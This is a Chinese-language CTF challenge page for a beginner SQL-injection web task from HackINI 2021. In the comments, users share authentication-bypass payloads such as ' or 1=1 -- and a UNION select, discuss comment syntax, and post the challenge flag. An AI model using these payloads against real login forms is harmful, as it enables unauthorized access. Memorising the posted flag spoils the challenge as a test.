my-first-sqliWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2021
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 7539
提  示:
描  述:
My First SQL injection!!
评论
何妨吟啸且徐行 2年前

考察万能密码,用户名填:a' or 1--,密码随便填。

回复 0

xiaobai568 2年前

admin' --

回复 0

aWxvdmVjdGY 2年前

admin/ ' or 1=1 --

回复 0

ycxsz 2年前

一点过滤也没有

回复 0

treasure11 2年前

数据库只要返回条件为真,就会返回flag 1' union select 1,1--+

回复 0

char2 2年前

这flag长得跟个假的一样

回复 0

xjh888 2年前

这有人用sqlmap我笑他一辈子

回复 0

yituoshi 2年前

Half the truth is often a big lie:shellmates{SQLi_goeS_BrrRR}

回复 0

2200394635 2年前

直接最简单的 1' or '1=1

回复 2

wclc 2年前

为什么注释要用--+才可以,我用的#爆不出来

回复 0
adminhrp 2年前

可能是版本或者sql应用不同,这里用--也可以实现,2个玩意都是sql注释

回复 0

WriteUp

image
thb143

0 金币

评分(12)

解题动态

a1091441965 攻破了该题 6小时前
zhaoxiaohou 攻破了该题 6小时前
hardees90 攻破了该题 13小时前
阿尔咖喱鸭 攻破了该题 13小时前
Kur0Ai1uro. 攻破了该题 18小时前
pakali 攻破了该题 19小时前
SoloNoke 攻破了该题 20小时前
2020894943 攻破了该题 1天前
liaty 攻破了该题 1天前
何以书 攻破了该题 1天前
Decay_念 攻破了该题 1天前
13615049106 攻破了该题 1天前
世间万物 攻破了该题 1天前
hh1o1 攻破了该题 1天前
Ylanz 攻破了该题 1天前
JINY123 攻破了该题 2天前
全都拿下 攻破了该题 2天前
crazychen 攻破了该题 2天前
xwq 攻破了该题 2天前
hyjm070819 攻破了该题 2天前
问题反馈